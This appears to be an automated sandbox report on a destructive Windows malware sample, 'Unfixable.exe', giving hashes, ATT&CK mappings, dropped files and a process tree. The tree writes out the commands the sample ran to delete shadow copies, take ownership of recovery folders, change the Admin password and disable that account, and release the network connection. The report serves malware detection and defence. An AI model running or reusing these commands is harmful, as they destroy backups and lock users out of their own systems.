1550ad6450fa1249d7df59437ff913f77e676b0058827f44f5056e3f9bea777e

Analysis

max time kernel
16s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Unfixable.exe
Size

5.1MB
MD5

8dd2a995e10ef27bcda77db5d072e2b0
SHA1

5606060fe0033e9688604b424968175d3c1dc99e
SHA256

1550ad6450fa1249d7df59437ff913f77e676b0058827f44f5056e3f9bea777e
SHA512

da79ed9e270764b3cd277c9612457f937e2508f22dea1a9f65130a8f82749b72d70bf28129d8e550bcb16380ff9d60113e42a6d4b7370e09a7178f5796c4b43a
SSDEEP

98304:l4N+EvlU/hy5t0gA8pyj6V3O0FwEAZIv6EYd9+wvWe/uejc0wH1NXGp:SN+GYgA8kjqrvAZgpYd9ht/bA0wH1+

Score

9^/10

defense_evasion discovery execution impact ransomware

Malware Config

Signatures

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Modifies file permissions 1 TTPs 7 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid process

6376 takeown.exe
6800 takeown.exe
6768 takeown.exe
6320 takeown.exe
5992 takeown.exe
5984 takeown.exe
5856 takeown.exe

pid	process
6376	takeown.exe
6800	takeown.exe
6768	takeown.exe
6320	takeown.exe
5992	takeown.exe
5984	takeown.exe
5856	takeown.exe

Drops file in System32 directory 3 IoCs

Processes:

Unfixable.exe

description	ioc	process
File created	C:\Windows\SysWOW64\FileCache\iejuSJ6Llvp0l.mp3	Unfixable.exe
File created	C:\Windows\SysWOW64\WindowsActionBroker.exe	Unfixable.exe
File created	C:\Windows\SysWOW64\WindowsBac.bat	Unfixable.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1852 powershell.exe
3384 powershell.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exe

pid process

5368 ipconfig.exe
6040 ipconfig.exe
Runs net.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

AUDIODG.EXE

description pid process

Token: 33 4536 AUDIODG.EXE
Token: SeIncBasePriorityPrivilege 4536 AUDIODG.EXE
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Unfixable.exe

pid process

4932 Unfixable.exe
4932 Unfixable.exe

pid	process
1852	powershell.exe
3384	powershell.exe

pid	process
5368	ipconfig.exe
6040	ipconfig.exe

description	pid	process
Token: 33	4536	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4536	AUDIODG.EXE

pid	process
4932	Unfixable.exe
4932	Unfixable.exe

C:\Users\Admin\AppData\Local\Temp\Unfixable.exe
"C:\Users\Admin\AppData\Local\Temp\Unfixable.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.douyin.com/user/MS4wLjABAAAArNRJAFNAlIHq7cS9kQZdAp09vlBP4LhgOijVk7dE6m5rYQwxX2hIZ6hdVvspgp8e
2⤵
PID:1092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe488946f8,0x7ffe48894708,0x7ffe48894718
3⤵
PID:4936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,8684355762323662551,3275073510838768193,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
3⤵
PID:3892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,8684355762323662551,3275073510838768193,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
3⤵
PID:5044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,8684355762323662551,3275073510838768193,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2436 /prefetch:8
3⤵
PID:844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,8684355762323662551,3275073510838768193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
3⤵
PID:2368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,8684355762323662551,3275073510838768193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
3⤵
PID:2056

C:\Windows\SysWOW64\mspaint.exe
"C:\Windows\System32\mspaint.exe"
2⤵
PID:2516

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
2⤵
PID:1272

C:\Windows\SysWOW64\calc.exe
"C:\Windows\System32\calc.exe"
2⤵
PID:2460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nologo -ExecutionPolicy unrestricted -file C:\Windows\system32\FileCache\a0B9MkPx1tMD.ps1
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nologo -ExecutionPolicy unrestricted -file C:\Windows\system32\FileCache\a0B9MkPx1tMD.ps1
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1852

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\OzGEsUeAMSzC4OP.bat
2⤵
PID:1900

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\tkXWy.bat
2⤵
PID:780

C:\Windows\SysWOW64\net.exe
net user Admin /fullname:Destroyed
3⤵
PID:6024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:Destroyed
4⤵
PID:4020

C:\Windows\SysWOW64\net.exe
net user Admin NOESCAPE
3⤵
PID:6384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin NOESCAPE
4⤵
PID:6536

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\Ha5ME6T.bat
2⤵
PID:4040

C:\Windows\SysWOW64\shutdown.exe
shutdown -a
3⤵
PID:5976

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:6040

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\iIcO0xFAyQOe.bat
2⤵
PID:1340

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\recovery
3⤵
- Modifies file permissions
PID:5992

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\recovery /r /d /y
3⤵
- Modifies file permissions
PID:5856

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\Recovery /r /d /y
3⤵
- Modifies file permissions
PID:6800

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\g2F9kJIbafqs.bat
2⤵
PID:2872

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\em9uEqfiMFyb.bat
2⤵
PID:2480

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete /nointeractive
3⤵
PID:5684

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\cGDOY8Mqp4ap.bat
2⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\OzGEsUeAMSzC4OP.bat
2⤵
PID:1876

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\tkXWy.bat
2⤵
PID:1480

C:\Windows\SysWOW64\net.exe
net user Admin /fullname:Destroyed
3⤵
PID:5964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:Destroyed
4⤵
PID:6004

C:\Windows\SysWOW64\net.exe
net user Admin NOESCAPE
3⤵
PID:6080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin NOESCAPE
4⤵
PID:6232

C:\Windows\SysWOW64\net.exe
net user Admin /active:no
3⤵
PID:4452

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\Ha5ME6T.bat
2⤵
PID:4404

C:\Windows\SysWOW64\shutdown.exe
shutdown -a
3⤵
PID:5728

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:5368

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\iIcO0xFAyQOe.bat
2⤵
PID:2364

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\recovery
3⤵
- Modifies file permissions
PID:5984

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\recovery /r /d /y
3⤵
- Modifies file permissions
PID:6376

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\Recovery /r /d /y
3⤵
- Modifies file permissions
PID:6768

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\restore
3⤵
- Modifies file permissions
PID:6320

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\g2F9kJIbafqs.bat
2⤵
PID:3472

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\em9uEqfiMFyb.bat
2⤵
PID:3824

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete /nointeractive
3⤵
PID:5508

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\system32\FileCache\cGDOY8Mqp4ap.bat
2⤵
PID:2176

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f0 0x418
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4536

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:2796

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:1008

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5324

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5572

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6012

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6136

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5828

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6888

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Windows Management Instrumentation

T1047

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
b2a1398f937474c51a48b347387ee36a

SHA1
922a8567f09e68a04233e84e5919043034635949

SHA256
2dc0bf08246ddd5a32288c895d676017578d792349ca437b1b36e7b2f0ade6d6

SHA512
4a660c0549f7a850e07d8d36dab33121af02a7bd7e9b2f0137930b4c8cd89b6c5630e408f882684e6935dcb0d5cb5e01a854950eeda252a4881458cafcc7ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
1ac52e2503cc26baee4322f02f5b8d9c

SHA1
38e0cee911f5f2a24888a64780ffdf6fa72207c8

SHA256
f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4

SHA512
7670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
Filesize
44KB

MD5
eb9f2ea98332585f0dd5c9bc47c819d8

SHA1
f999552e1b5aec76d61b54ac8664cbdd5e3d304b

SHA256
077578728584bf18be12019da75a86ebe94de032e08e98ac1f0632043ad54306

SHA512
b85e0a1a78c1bbcafced15fa2735bf5af9c9b8e3d8107046b18189c3ec339066239a6d9053ca0432f649575ec3934ffdb42fffa793c17c821e73829aed181dd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
Filesize
264KB

MD5
cd257d5d700d475f8e5584e17d43495f

SHA1
bc2248882c45ebd9a334f7e56a686e73603a3b9a

SHA256
e24c18129a622e61c15776ee47ffaac4dce474011c4a43f7afddacf60096d0cc

SHA512
20c206f37bc03bffe2bfae3513125d9e76c56007f3b2d2ae8e0a6b772475a56c8dd0d6acdd83cc0284bb4217f44996171637ed221de205fd54bbb309a32f0ec5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
Filesize
4.0MB

MD5
c873598e21d3aa7c0cf7ca218fb2f2d2

SHA1
25c1186888f4e37c9dc31b12b7146e273b23373a

SHA256
1f7d97819ae0b4360f536f8d11b1abeaf855c261caa4bdc8e8c52a4e266f4277

SHA512
d2088df2efcd4d3e7288b941e4e4fe82635cb8aa3cd217b46d12d9ba6fd1425d664ae762cc320555583925f9f6d4e022e096d73436b82bc021be816bdbc26468

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001
Filesize
20KB

MD5
ceb546d32deb087e072e676a272846b5

SHA1
d08c7ac52fe0c749af9e5114f1a3826d8a12c2ad

SHA256
5801926185af1b136971a9d7e88774d04bdd8fd881c57e500cdebfcd2df526d6

SHA512
dd343f1eb5e1b0c0740f7ead2ecae607290cb219801132918ea4f4802fd3a7499d87fe2f1e020c1655bf2bb10f6911b0a361944fcd8daf2a2a8622c2ca1ecbe8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
Filesize
319B

MD5
62566026f015982e3dee5117ed71d3e1

SHA1
410f2d0ffd1ef85a30984029922516b2e2ec4904

SHA256
ae95ab34776703f6ef1d180201a4fc527653345cd518e79c510556ecc996fd7e

SHA512
b59db6971ecae0b94d543e4eea74b31b39d5a699a437536cfcd307f08517669853eb9260c2cf7e8b7445433da09cf06031fa1247bfcb0321cb0d8c6dd6fe385e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Filesize
28KB

MD5
387d5c8406f1841e16b20d8480195db0

SHA1
afd3fb5938045708935a44d6495f7bd4f4bd690a

SHA256
f6d86a1e9911f02e6acaaeddd46b977daad1b9e3d21c660877800d0a845bd2fe

SHA512
19f8ff35f7910cc9f0cce728a7856c7a8e619adacb9a9592130aeac213d18cc3fef3e6388a15189cff053cf753267abececee5da763357aaed969dd18da5cfb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
Filesize
331B

MD5
59f09a5d40cd32e2284544a33838912c

SHA1
27042bfb96c06c6ee319319c810756accfe9a850

SHA256
ee5fd805d4224033e4f6d134ddbabc390bca71702b5a28c1b199201c33b1952d

SHA512
ea85140c59dd61f95f7136ca87a3e0b396c204aff7f764df5c7b144489f22d985466ca62582176b62866086dbe0cc12ff79c0765c7f8036f55066b6979d3fb3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
55e09b180236379ddc92e3b1493874f1

SHA1
92b14403af08f214f518b088dd3cd549d70e0181

SHA256
b463e51b9b893e286cd6017b532aa320a55417d6c76f2230addfd4c6e39a4e99

SHA512
9aa79bfc72f6ec00a464eb282c963d25f41752b236110fd131c5b234249baa8c203d68697e86a9d8528047e54e2778eb55d2ca2002e4174f5236202d1d77fcc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
Filesize
207B

MD5
599a249d76656a24f0c86d06c5219167

SHA1
cd99ae0582d47468cd2b6f51b5a7194db03b8a61

SHA256
b53edcc2567391c8e7ef848275c147f975f3dd36ec1ac8a8ad15f6910b65fb9b

SHA512
8c30aa5f3934472b2c9971e109fbee2349931d86d254e00e714a783cd0a36accbede902a5f81befafa3f19dcab68b62ec67964e8b2fa17694d736d818735b19a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
Filesize
319B

MD5
b07364ce5a993d76f6c25c5d1b922ac8

SHA1
11ccea573b63e8a0897d45832c63be0a749ef884

SHA256
a4ae992092e2058448951917a5906135ddf73f36a1bb1026c40d0ac43678eeab

SHA512
54cbc7e230abf05fb6280d3c464f5986fce106c72b290f0ebdde748acc6138d975b274cad28fbacc24d1bdf52ae5ef729987ad9b694870ea3eef5d7e3efe7433

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13360862588725479
Filesize
2KB

MD5
0fe007486b42040214b9a6c6f56e507d

SHA1
92fee25c078fedc036008dae66ba6f3a9b2037ae

SHA256
6de1928f55e0df63f5f157c7cba332ecee190eb7dbcef553d9398c3eca3ccdc7

SHA512
defc0daa3f2733c838098c19e74a09ec07d20efc2cfba343bc0dde4ebdc21b91c4c0f6b6e9ce892332c601763f14d8273cff72ed72fbada8e54129c0d6706f6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13360862589132479
Filesize
933B

MD5
420e2f5fbfa1a4b0876f23e618047218

SHA1
d8df1502ac637b3025010f66bdf137a5a826685f

SHA256
ed290935d8dc4606e4e0826005c27f42b34d9c22442cf9bc1c8d477a30244846

SHA512
2e510d5659032f0aba36f484c5d4122c45dae3af793e441b8b8c25fa7946dc775099443b18dc285eaec1a787ed780aee688af08d79f2064ef71b2997976d4c67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
Filesize
350B

MD5
8d52d24e619b33c813cee3dc91988974

SHA1
8c1c1d9729fe53eb9b8ba216b804f8146b4d9dd6

SHA256
1f0e46256ed9c9b925cac8bfa3dac593f607d48cba3d8c90e67acc665eaddb69

SHA512
1f3473c064062ab491f865426d4c2f77e2d9f7f88189ade22274ac9e94e3e3ed4cd4e4cca63473689ae4aee160324d3cc8eb969dc96cd5f3f1176ee0895e9ddb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
Filesize
323B

MD5
e77d0d48e08791304058fc247daad378

SHA1
c5ff7d79b41d760e7c65ae8a0c803e4bbf99736f

SHA256
ca8c7656912eda73a0b9144ccddd90e88f8319b7c41cb52cab55b66ac1b3ed2f

SHA512
a30904eb8917f9ffeeb8fe16dbda761eb32d4d77525e53f82135098857c1991d0c482808fb3f46a7ed667090e0c49d94d0d5d117c8e201aef15970c5c976462a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
Filesize
128KB

MD5
5fb25b7997e4ad729024addf65cd5eab

SHA1
2b7dd9d9c9351ed9de5cf7415ed6f94d5d67398a

SHA256
3b847d7a1f0a356ffca1e37562b36cfcb92a4ee59a2f00f4f485ac0bc859cd17

SHA512
562f00bd96750d1ef93daddca4b33074804ccd26b9984bdd2308de3d01719ba46d1f7767698804eb6910def123ea4ccae26f9071837e8aa5130455dc0e99b3f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal
Filesize
32KB

MD5
cfad6b570d35bb5df380a906882e7a12

SHA1
aa23a7024b1c26d6f5a3f36dc30d31cc630af394

SHA256
b406a6ee8058aaf87a331e7ede4f5ad2f2e5e541f62724e0a6489269055618e1

SHA512
e87cd2448f7e7293c55a46bcdaf80315320337a5332b51124e5a3db6a0587f506e71c5db1bebbd241d4d9c934d1b26b9402d03f5045ca3723235a831104017d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
Filesize
319B

MD5
fc5964d0a98d80bba35f277a60b9d30c

SHA1
614323c76018e1eecebd258ce3e01271c13e7624

SHA256
4ccda0b418780637dfe2db24e44e00c51e9362234772697bc031c588f52f5425

SHA512
4a3a82b2ffa6d47202e19f21cdb4b7fd2d8c6936b77fc9169324a15d0d4ae82964102861b92f7bcf5ddf8bd8da830edde09dbddfb3876b926dde7388c1556d13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
Filesize
160B

MD5
2e19a9040ed4a0c3ed82996607736b8f

SHA1
5a78ac2b74f385a12b019c420a681fd13e7b6013

SHA256
2eeb6d38d7aad1dc32e24d3ffd6438698c16a13efd1463d281c46b8af861a8ce

SHA512
86669994386b800888d4e3acb28ab36296594803824d78e095eb0c79642224f24aca5d2892596ac33b7a01b857367ed3a5e2c2fb3405f69a64eb8bf52c26753f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
Filesize
337B

MD5
3c6880a7ee96050551d549a2051bbfa1

SHA1
eeca262e841bab84b5e01345156132f9dfc5a77d

SHA256
e38dbdb69cb8f27110089674b3f6f158302e73255ab6e882c1affe6b7810d008

SHA512
86490fef3ad076a981ecb5be9f18f41ed1b329aa26cdf9f38af48d18c34cce3edd27e65d624ec18d4f987ca5bfcbd9cd96fedc0a33529e50a93195212c93d45f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
Filesize
44KB

MD5
ec21563aab50c13a8563d5d4fb0b2f68

SHA1
6b282390a39e04da8c4199ed338b5af968078f88

SHA256
a7ec1db517058fcaa90abaa84b016c318b0c999d537cc5d9bbca8d718e50efbe

SHA512
4ee555f985b939af2e1cedc92177e9bf3da9c20c9c76a26bef77412e7b695c8035653d1396e1978311a4e60c1432e67ec1328b49f22f7de8d20b5803e3e6e17d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
Filesize
264KB

MD5
57bbac7f035655929d76e5beb3b4f7af

SHA1
052b73ae5159a0b4d38aa450643e3dd187b2f762

SHA256
53c9958b18b381ef3587a1d0190074abc63db4fcd0546839a2571fea91955fa0

SHA512
51b5b040abf30828276dc6adee0c80363eefcdf2f4ca563a29d7dbced5877ed346090195bc7760a3c5e6fbc5cfad02c57db7089ac394d4b2b4a986bfd1d2fc8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
Filesize
4.0MB

MD5
4459bf26eebf0293b75c624cdf1c6b23

SHA1
2a0cf63d7d2a2a729b1b84e221955a5ab46f2e47

SHA256
2ddd13a6fc974d25f11c33a905c39ba8b6d266f7c58a93a41e5ada5975c821c7

SHA512
f9246c653ea54d90833734d359ebba743e97a7978639a8c48f64f2b026affed9281e65a44d12af2224e0493df1e3ca3dfd8fd101bd4c5170471b5dd6dbaf8f12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize
4KB

MD5
6cc66d2c0a9251c02d5499201e9b4c6f

SHA1
3180f7365f418bac162885f1591f6d97b843dba4

SHA256
7fbe9bf702966633b7b8b6e481de3c83a7deedf3fcaec40c9fc2784020cad775

SHA512
8fffe98007b2194bdcb779d0db2cefe0d72bc745886aad575d8954c773627317a933a7865b8d9283558102bbed333f1a88d77aa065ef46cca3fab6c346a819cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\240679953\....\TemporaryFile
Filesize
44KB

MD5
f942093105d164ada9bf07de19037e6f

SHA1
202ee85cba6058df3fecb1626f7b81e3bea42b2e

SHA256
b5e12bb171732661358e5507af4d7255c22b06d0741cccb0b69e00ba8a68f43a

SHA512
17aea80dc2027684c33a62f3271ba48206099732ffafc2da305b21872003b9f105bfde5591500d1244a385e439c18d79ba97355d3e7fdc4146dcc26b70fb51e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\240680093\....\TemporaryFile
Filesize
1.0MB

MD5
9a1394f54f02c5ccfd4092a7b7ecb383

SHA1
f84f7e912390746b1dd08bbcb92f878fdc7e6ef8

SHA256
f409641d46d0eff6c7fde211e838091b0480abf81e9b0e01f732a44ce4a2a47b

SHA512
a8e4698564d42824dfd18effbfb132429f9b80e10e80ef68b7f861c040252eefbf1538765d2ee9389aab398e58d145481367d88f8aa434521daceaa7f866a6ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_brarkj5y.itr.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
